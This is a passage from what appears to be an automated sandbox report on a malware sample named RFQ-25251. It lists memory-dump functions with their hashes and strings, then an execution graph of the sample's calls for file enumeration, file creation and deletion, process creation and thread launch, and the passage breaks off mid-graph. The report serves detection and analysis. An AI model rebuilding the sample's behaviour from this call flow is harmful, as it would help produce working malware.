                              • Instruction Fuzzy Hash: 1490022125180802D140715D84147070006D7D0A01F55C115A2024554DC6178A6567B1
                              Function 012B39B0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7519da8ab53b5f85b1aa3744b078dfc572579ed33ce05825afbc5d0cd4c5d855
                              • Instruction ID: 3581e18b6ceca5d05dfbd3108740b0ced57e6bfcf1b3939db53c61717fee8c4a
                              • Opcode Fuzzy Hash: 7519da8ab53b5f85b1aa3744b078dfc572579ed33ce05825afbc5d0cd4c5d855
                              • Instruction Fuzzy Hash: 44900431355C5103D150715D44047174005F7F0701F55C135F3C145D4DC557CD557331
                              Function 012B3D10 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90df1b759898e1a401e89f000c5978ba4bbc40888b166dcbcf67e6fe52adc0c7
                              • Instruction ID: 052db330a89f6508fe1295b35db2340a9e74e4bc92142286f496de64e4fe5134
                              • Opcode Fuzzy Hash: 90df1b759898e1a401e89f000c5978ba4bbc40888b166dcbcf67e6fe52adc0c7
                              • Instruction Fuzzy Hash: 64900231212801429540725D5804A4E410597E1702B95D519A2015554CC91589615321
                              Function 012B3D70 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 46c2abbe87e1696b494a4ed19616545f52b8c8746ef84658f00e2bc61ce46b3b
                              • Instruction ID: 4ac21ff584b7501b51d94ac6fc1a75a856b6f6bb68ab770a5e23689e2a55831d
                              • Opcode Fuzzy Hash: 46c2abbe87e1696b494a4ed19616545f52b8c8746ef84658f00e2bc61ce46b3b
                              • Instruction Fuzzy Hash: F390023521180402D510715D5804646004697D0701F55D515A2424558DC65589A1A221
                              Function 012B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                              • Instruction ID: 5783251a11f78588bdc109c3e79211f1bb584ffe8788b171bafd787bdb9280b1
                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                              • Instruction Fuzzy Hash:
                              Function 012B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                              • API String ID: 48624451-2108815105
                              • Opcode ID: ea7056d26df56c729bd0843fac16ea641635e86de778331e38243356947d5b75
                              • Instruction ID: 2ca7f8db6a9fd20e9a901b06d8de2a7641e217ae1658160c3d9f333d0f4d1c09
                              • Opcode Fuzzy Hash: ea7056d26df56c729bd0843fac16ea641635e86de778331e38243356947d5b75
                              • Instruction Fuzzy Hash: 4D51E9B5A20617EFCB11DB5C88D05BEFBB8BB083807548229E5A9D7641D374EE4087E0
                              Function 01322410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                              • API String ID: 48624451-2108815105
                              • Opcode ID: d6331ab2ba6e5383e20748f26d0d50bca1c55238387d24f49a504c2468b034f9
                              • Instruction ID: 6d2bd360a63e6300d77a99d791839bc329fc24621bbb80ebc84e37144e329e31
                              • Opcode Fuzzy Hash: d6331ab2ba6e5383e20748f26d0d50bca1c55238387d24f49a504c2468b034f9
                              • Instruction Fuzzy Hash: 24510375A00666AFDB31EE9CCC9087FFBF8AB44208B148459E596D7681E6B4DA408760
                              Function 012A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                              Download Yara Rule
                              Strings
                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012E4725
                              • Execute=1, xrefs: 012E4713
                              • ExecuteOptions, xrefs: 012E46A0
                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 012E4787
                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012E4742
                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012E46FC
                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012E4655
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                              • API String ID: 0-484625025
                              • Opcode ID: fe713dc272f181a9ca2bd2151aff5b5d955cc2cef33939dae86fadb39652c80d
                              • Instruction ID: d79ee2012ddf8938d3dcc12b27b85392490c787bf1450317ad9385b02edf88f0
                              • Opcode Fuzzy Hash: fe713dc272f181a9ca2bd2151aff5b5d955cc2cef33939dae86fadb39652c80d
                              • Instruction Fuzzy Hash: 32514A3162020A7FEF24EBA8DC99FFD77B8AF14704F8400A9DA05A7191E7729E418F54
                              Function 01346940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                              • Instruction ID: 1700c39d08c19f81b000d087faa360de294f312f038bcbaad5e789be74d0a9c0
                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                              • Instruction Fuzzy Hash: E70225B1508342AFD705CF18C590A6FBBE9EFC9708F04892DF9898B264DB31E945CB52
                              Function 012BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: __aulldvrm
                              • String ID: +$-$0$0
                              • API String ID: 1302938615-699404926
                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                              • Instruction ID: 7f1bbaa5a28b580907f55146a4c6ededb47dd61b98d1a8f91b949cdd08f233c8
                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                              • Instruction Fuzzy Hash: B281E571E3524A9EEF29CE6CC8D17FEBBB1AF45390F184119DA61A72D1C7709880CB51
                              Function 013220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: %%%u$[$]:%u
                              • API String ID: 48624451-2819853543
                              • Opcode ID: 74106765554071ce5d809e7674cacde2e8f84a0a1c577252af8c5840aab11481
                              • Instruction ID: 12eae0a81ef956ded17539a8081f602c11bbf730fed2c919dff3a98ecaf1a986
                              • Opcode Fuzzy Hash: 74106765554071ce5d809e7674cacde2e8f84a0a1c577252af8c5840aab11481
                              • Instruction Fuzzy Hash: 5121537AA10129ABDB11EE69CC40EFFBBECAF54644F14011AEA05E3240E730A9018BA1
                              Function 0129F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                              Download Yara Rule
                              Strings
                              • RTL: Re-Waiting, xrefs: 012E031E
                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012E02BD
                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012E02E7
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                              • API String ID: 0-2474120054
                              • Opcode ID: d043fd97c17fbac1113aa712bbb4c49a334abc491c3d99c56da142e9eb40710c
                              • Instruction ID: 2f7284d79b328c7dd03ff04623ec47ff62b873750dad57491d1cdef705319cdb
                              • Opcode Fuzzy Hash: d043fd97c17fbac1113aa712bbb4c49a334abc491c3d99c56da142e9eb40710c
                              • Instruction Fuzzy Hash: 18E1BE306247429FDB65CF2CC985B6ABBE0BB84314F144A2DF6A5CB2E1D7B4D845CB42
                              Function 012ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                              Download Yara Rule
                              Strings
                              • RTL: Re-Waiting, xrefs: 012E7BAC
                              • RTL: Resource at %p, xrefs: 012E7B8E
                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 012E7B7F
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                              • API String ID: 0-871070163
                              • Opcode ID: 9addf71a1ca513316e9dbec32bd836a143ba5f5368c170238102f8358bd4df2d
                              • Instruction ID: 4ee7cdb04a8fc7e51fa37cba4caa532f193bd97614cef7fbeeaa64e73a91afa9
                              • Opcode Fuzzy Hash: 9addf71a1ca513316e9dbec32bd836a143ba5f5368c170238102f8358bd4df2d
                              • Instruction Fuzzy Hash: 2341E3353207039FDB21CE29C951B6AB7E9EF98710F440A2DFA5AD7680DB71E805CB91
                              Function 012AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                              Download Yara Rule
                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E728C
                              Strings
                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012E7294
                              • RTL: Re-Waiting, xrefs: 012E72C1
                              • RTL: Resource at %p, xrefs: 012E72A3
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                              • API String ID: 885266447-605551621
                              • Opcode ID: 0fe4d8698407e1664515adb225c1c875d5729d6e6bd842d9401ecc52252219d1
                              • Instruction ID: 19a4276fde381f1b3ada7c0d937b30ff0b5bfcdcf994bec533992cdef00b9db0
                              • Opcode Fuzzy Hash: 0fe4d8698407e1664515adb225c1c875d5729d6e6bd842d9401ecc52252219d1
                              • Instruction Fuzzy Hash: AD41F035620203ABD721DE29CC41B6ABBE5FB54710F500629FE55EB240DB71E806CBD1
                              Function 01322300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: %%%u$]:%u
                              • API String ID: 48624451-3050659472
                              • Opcode ID: f4fe1cf96a510a64e3eb8331cde2f7066a0fb7c91c60a8ffe9e1cb597f77b8f7
                              • Instruction ID: e2c765ad0606625e8062c63600e5e0536eb4a02ec5e6546350852eb0a808ba6a
                              • Opcode Fuzzy Hash: f4fe1cf96a510a64e3eb8331cde2f7066a0fb7c91c60a8ffe9e1cb597f77b8f7
                              • Instruction Fuzzy Hash: D8318472A102299FDB20DE2DDC40BFFB7F8EF54654F444559E949E3240EB30AA448BA0
                              Function 012B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: __aulldvrm
                              • String ID: +$-
                              • API String ID: 1302938615-2137968064
                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                              • Instruction ID: becea9142fca09c9983b638d6778c45549aa503ed0a2f0f942ad60e36151e117
                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                              • Instruction Fuzzy Hash: AF919F71E2020B9BEB24DF6DC8C1AFEBBA5AF847E0F14451AEA55E72C0D77099408B15
                              Function 01279126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: $$@
                              • API String ID: 0-1194432280
                              • Opcode ID: bdac43ed9d8e65a8cccc207f151dd59531cad829f028253a2f2e0a6f90816d77
                              • Instruction ID: 286ffe4128f5b2acae08467d027010bb873f59bffdb5433430a0c7774db7c574
                              • Opcode Fuzzy Hash: bdac43ed9d8e65a8cccc207f151dd59531cad829f028253a2f2e0a6f90816d77
                              • Instruction Fuzzy Hash: 08812C71D1026ADBDB35DB54CC45BEEB7B8AB08754F0041DAEA19B7280D7705E84CFA0
                              Function 012FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                              Download Yara Rule
                              APIs
                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 012FCFBD
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: CallFilterFunc@8
                              • String ID: @$@4rw@4rw
                              • API String ID: 4062629308-2979693914
                              • Opcode ID: f9c41923ce6efb578dbffd59c78675ba82e0484829946e8cb6fbf8ade6890dad
                              • Instruction ID: 5b82750fd0234d93b7a1f7fe73ee4b1d56470412de8cd93fe6232396d4725558
                              • Opcode Fuzzy Hash: f9c41923ce6efb578dbffd59c78675ba82e0484829946e8cb6fbf8ade6890dad
                              • Instruction Fuzzy Hash: 70418DB1920219DFDB219FA9C840AADFBB8FF54B44F00813EEA05EB365D7749801CB61

                              Execution Graph

                              Execution Coverage:2.6%
                              Dynamic/Decrypted Code Coverage:4.3%
                              Signature Coverage:2.3%
                              Total number of Nodes:441
                              Total number of Limit Nodes:71
                              execution_graph 96043 4b2e0c 96048 4b7540 96043->96048 96046 4b2e31 96049 4b2e1c 96048->96049 96050 4b755a 96048->96050 96049->96046 96054 4c7da0 96049->96054 96057 4c74c0 96050->96057 96053 4c7da0 NtClose 96053->96049 96055 4c7dbd 96054->96055 96056 4c7dce NtClose 96055->96056 96056->96046 96058 4c74dd 96057->96058 96061 2eb35c0 LdrInitializeThunk 96058->96061 96059 4b762a 96059->96053 96061->96059 96062 4b55c2 96063 4b554a 96062->96063 96068 4b55c5 96062->96068 96069 4c7420 96063->96069 96067 4b556b 96070 4c743d 96069->96070 96078 2eb2c0a 96070->96078 96071 4b5556 96073 4c7e40 96071->96073 96074 4c7ec1 96073->96074 96076 4c7e61 96073->96076 96081 2eb2e80 LdrInitializeThunk 96074->96081 96075 4c7ef2 96075->96067 96076->96067 96079 2eb2c1f LdrInitializeThunk 96078->96079 96080 2eb2c11 96078->96080 96079->96071 96080->96071 96081->96075 96082 4a9400 96083 4a940f 96082->96083 96084 4a9450 96083->96084 96085 4a943d CreateThread 96083->96085 96086 4bbc00 96088 4bbc29 96086->96088 96087 4bbd2d 96088->96087 96089 4bbcd3 FindFirstFileW 96088->96089 96089->96087 96090 4bbcee 96089->96090 96091 4bbd14 FindNextFileW 96090->96091 96091->96090 96092 4bbd26 FindClose 96091->96092 96092->96087 96095 4bf5c0 96096 4bf5dd 96095->96096 96099 4b41e0 96096->96099 96098 4bf5fb 96100 4b4204 96099->96100 96101 4b4240 LdrLoadDll 96100->96101 96102 4b420b 96100->96102 96101->96102 96102->96098 96103 4b6b80 96104 4b6b9c 96103->96104 96108 4b6bef 96103->96108 96106 4c7da0 NtClose 96104->96106 96104->96108 96105 4b6d18 96107 4b6bb7 96106->96107 96113 4b5f90 NtClose LdrInitializeThunk LdrInitializeThunk 96107->96113 96108->96105 96114 4b5f90 NtClose LdrInitializeThunk LdrInitializeThunk 96108->96114 96110 4b6cf2 96110->96105 96115 4b6160 NtClose LdrInitializeThunk LdrInitializeThunk 96110->96115 96113->96108 96114->96110 96115->96105 96116 4c5a00 96117 4c5a5d 96116->96117 96118 4c5a88 96117->96118 96121 4bfee0 96117->96121 96120 4c5a6a 96126 4bfca0 96121->96126 96122 4bfed0 96122->96120 96123 4c7da0 NtClose 96123->96126 96124 4b5e10 LdrInitializeThunk 96124->96126 96125 4c7880 LdrInitializeThunk 96125->96126 96126->96122 96126->96123 96126->96124 96126->96125 96127 4c7ac0 96128 4c7b6c 96127->96128 96129 4c7ae8 96127->96129 96130 4c7b82 NtCreateFile 96128->96130 96131 4c0bc0 96132 4c0bdc 96131->96132 96133 4c0c18 96132->96133 96134 4c0c04 96132->96134 96136 4c7da0 NtClose 96133->96136 96135 4c7da0 NtClose 96134->96135 96137 4c0c0d 96135->96137 96138 4c0c21 96136->96138 96141 4c9da0 RtlAllocateHeap 96138->96141 96140 4c0c2c 96141->96140 96147 4ba491 96148 4ba464 96147->96148 96153 4ba190 96148->96153 96150 4ba46d 96167 4b9e30 96150->96167 96152 4ba489 96154 4ba1b5 96153->96154 96178 4b7b10 96154->96178 96157 4ba2f2 96157->96150 96159 4ba309 96159->96150 96160 4ba300 96160->96159 96162 4ba3f1 96160->96162 96193 4b9890 96160->96193 96164 4ba449 96162->96164 96202 4b9bf0 96162->96202 96206 4c9c80 96164->96206 96168 4b9e46 96167->96168 96175 4b9e51 96167->96175 96169 4c9d60 RtlAllocateHeap 96168->96169 96169->96175 96170 4b9e67 96170->96152 96171 4b7b10 GetFileAttributesW 96171->96175 96172 4ba15e 96173 4ba177 96172->96173 96174 4c9c80 RtlFreeHeap 96172->96174 96173->96152 96174->96173 96175->96170 96175->96171 96175->96172 96176 4b9890 RtlFreeHeap 96175->96176 96177 4b9bf0 RtlFreeHeap 96175->96177 96176->96175 96177->96175 96179 4b7b31 96178->96179 96180 4b7b38 GetFileAttributesW 96179->96180 96181 4b7b43 96179->96181 96180->96181 96181->96157 96182 4c2210 96181->96182 96183 4c221e 96182->96183 96184 4c2225 96182->96184 96183->96160 96185 4b41e0 LdrLoadDll 96184->96185 96186 4c225a 96185->96186 96187 4c2269 96186->96187 96212 4c1ce0 LdrLoadDll 96186->96212 96192 4c2401 96187->96192 96209 4c9d60 96187->96209 96190 4c9c80 RtlFreeHeap 96190->96192 96191 4c2282 96191->96190 96191->96192 96192->96160 96194 4b98b6 96193->96194 96216 4bd0d0 96194->96216 96196 4b991d 96198 4b9aa0 96196->96198 96199 4b993b 96196->96199 96197 4b9a85 96197->96160 96198->96197 96200 4b9750 RtlFreeHeap 96198->96200 96199->96197 96221 4b9750 96199->96221 96200->96198 96203 4b9c16 96202->96203 96204 4bd0d0 RtlFreeHeap 96203->96204 96205 4b9c92 96204->96205 96205->96162 96229 4c8110 96206->96229 96208 4ba450 96208->96150 96213 4c80c0 96209->96213 96211 4c9d7b 96211->96191 96212->96187 96214 4c80dd 96213->96214 96215 4c80ee RtlAllocateHeap 96214->96215 96215->96211 96218 4bd0e6 96216->96218 96217 4bd0f3 96217->96196 96218->96217 96219 4c9c80 RtlFreeHeap 96218->96219 96220 4bd12c 96219->96220 96220->96196 96222 4b9766 96221->96222 96225 4bd140 96222->96225 96224 4b986c 96224->96199 96226 4bd164 96225->96226 96227 4bd1fc 96226->96227 96228 4c9c80 RtlFreeHeap 96226->96228 96227->96224 96228->96227 96230 4c812a 96229->96230 96231 4c813b RtlFreeHeap 96230->96231 96231->96208 96232 4b5490 96234 4b54c0 96232->96234 96237 4b78c0 96232->96237 96236 4b54ec 96234->96236 96241 4b7840 96234->96241 96238 4b78d3 96237->96238 96248 4c7330 96238->96248 96240 4b78fe 96240->96234 96242 4b7884 96241->96242 96243 4b78a5 96242->96243 96254 4c7130 96242->96254 96243->96234 96245 4b7895 96246 4b78b1 96245->96246 96247 4c7da0 NtClose 96245->96247 96246->96234 96247->96243 96249 4c73a3 96248->96249 96250 4c7354 96248->96250 96253 2eb2dd0 LdrInitializeThunk 96249->96253 96250->96240 96251 4c73c8 96251->96240 96253->96251 96255 4c719f 96254->96255 96256 4c7151 96254->96256 96259 2eb4650 LdrInitializeThunk 96255->96259 96256->96245 96257 4c71c4 96257->96245 96259->96257 96261 4b6d50 96262 4b6d68 96261->96262 96264 4b6dc2 96261->96264 96262->96264 96265 4ba960 96262->96265 96266 4ba986 96265->96266 96267 4baba5 96266->96267 96292 4c81a0 96266->96292 96267->96264 96269 4ba9fc 96269->96267 96295 4cae90 96269->96295 96271 4baa18 96271->96267 96272 4baae9 96271->96272 96273 4c7420 LdrInitializeThunk 96271->96273 96274 4b5410 LdrInitializeThunk 96272->96274 96276 4bab08 96272->96276 96275 4baa74 96273->96275 96274->96276 96275->96272 96278 4baa7d 96275->96278 96280 4bab8d 96276->96280 96304 4c6ff0 96276->96304 96277 4baad1 96281 4b78c0 LdrInitializeThunk 96277->96281 96278->96267 96278->96277 96279 4baaaf 96278->96279 96301 4b5410 96278->96301 96319 4c35e0 LdrInitializeThunk 96279->96319 96283 4b78c0 LdrInitializeThunk 96280->96283 96282 4baadf 96281->96282 96282->96264 96287 4bab9b 96283->96287 96287->96264 96288 4bab64 96309 4c7090 96288->96309 96290 4bab7e 96314 4c71d0 96290->96314 96293 4c81bd 96292->96293 96294 4c81ce CreateProcessInternalW 96293->96294 96294->96269 96296 4cae00 96295->96296 96297 4cae5d 96296->96297 96298 4c9d60 RtlAllocateHeap 96296->96298 96297->96271 96299 4cae3a 96298->96299 96300 4c9c80 RtlFreeHeap 96299->96300 96300->96297 96303 4b544e 96301->96303 96320 4c75e0 96301->96320 96303->96279 96305 4c7014 96304->96305 96306 4c7062 96304->96306 96305->96288 96326 2eb39b0 LdrInitializeThunk 96306->96326 96307 4c7087 96307->96288 96310 4c70ff 96309->96310 96311 4c70b1 96309->96311 96327 2eb4340 LdrInitializeThunk 96310->96327 96311->96290 96312 4c7124 96312->96290 96315 4c7242 96314->96315 96317 4c71f4 96314->96317 96328 2eb2fb0 LdrInitializeThunk 96315->96328 96316 4c7267 96316->96280 96317->96280 96319->96277 96321 4c767f 96320->96321 96322 4c7601 96320->96322 96325 2eb2d10 LdrInitializeThunk 96321->96325 96322->96303 96323 4c76c4 96323->96303 96325->96323 96326->96307 96327->96312 96328->96316 96334 4c0f50 96338 4c0f5f 96334->96338 96335 4c0fa3 96336 4c9c80 RtlFreeHeap 96335->96336 96337 4c0fb0 96336->96337 96338->96335 96339 4c0fde 96338->96339 96341 4c0fe3 96338->96341 96340 4c9c80 RtlFreeHeap 96339->96340 96340->96341 96342 4c7d10 96343 4c7d79 96342->96343 96345 4c7d31 96342->96345 96344 4c7d8f NtDeleteFile 96343->96344 96351 4c73d0 96352 4c73ed 96351->96352 96355 2eb2df0 LdrInitializeThunk 96352->96355 96353 4c7415 96355->96353 96356 4a9460 96359 4a9942 96356->96359 96357 4a9ef8 96359->96357 96360 4c9920 96359->96360 96361 4c9943 96360->96361 96366 4a3db0 96361->96366 96363 4c994f 96365 4c997d 96363->96365 96369 4c43e0 96363->96369 96365->96357 96373 4b2f10 96366->96373 96368 4a3dbd 96368->96363 96370 4c443a 96369->96370 96372 4c4447 96370->96372 96384 4b13a0 96370->96384 96372->96365 96374 4b2f27 96373->96374 96376 4b2f40 96374->96376 96377 4c8800 96374->96377 96376->96368 96379 4c8818 96377->96379 96378 4c883c 96378->96376 96379->96378 96380 4c7420 LdrInitializeThunk 96379->96380 96381 4c8891 96380->96381 96382 4c9c80 RtlFreeHeap 96381->96382 96383 4c88a6 96382->96383 96383->96376 96385 4b13db 96384->96385 96400 4b7650 96385->96400 96387 4b13e3 96388 4b16b2 96387->96388 96389 4c9d60 RtlAllocateHeap 96387->96389 96388->96372 96390 4b13f9 96389->96390 96391 4c9d60 RtlAllocateHeap 96390->96391 96392 4b140a 96391->96392 96393 4c9d60 RtlAllocateHeap 96392->96393 96395 4b141b 96393->96395 96399 4b14ae 96395->96399 96415 4b6460 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96395->96415 96396 4b41e0 LdrLoadDll 96397 4b166f 96396->96397 96411 4c6b00 96397->96411 96399->96396 96401 4b767c 96400->96401 96402 4b7540 2 API calls 96401->96402 96403 4b769f 96402->96403 96404 4b76a9 96403->96404 96405 4b76c1 96403->96405 96407 4b76b4 96404->96407 96408 4c7da0 NtClose 96404->96408 96406 4b76dd 96405->96406 96409 4c7da0 NtClose 96405->96409 96406->96387 96407->96387 96408->96407 96410 4b76d3 96409->96410 96410->96387 96412 4c6b5a 96411->96412 96414 4c6b67 96412->96414 96416 4b16d0 96412->96416 96414->96388 96415->96399 96419 4b16f0 96416->96419 96432 4b7920 96416->96432 96418 4b1bd5 96418->96414 96419->96418 96436 4c0580 96419->96436 96422 4b18f1 96423 4cae90 2 API calls 96422->96423 96426 4b1906 96423->96426 96424 4b174e 96424->96418 96439 4cad60 96424->96439 96425 4b78c0 LdrInitializeThunk 96428 4b1931 96425->96428 96426->96428 96444 4b0360 96426->96444 96428->96418 96428->96425 96429 4b0360 LdrInitializeThunk 96428->96429 96429->96428 96430 4b1a5f 96430->96428 96431 4b78c0 LdrInitializeThunk 96430->96431 96431->96430 96433 4b792d 96432->96433 96434 4b794e SetErrorMode 96433->96434 96435 4b7955 96433->96435 96434->96435 96435->96419 96448 4c9bf0 96436->96448 96438 4c05a1 96438->96424 96440 4cad76 96439->96440 96441 4cad70 96439->96441 96442 4c9d60 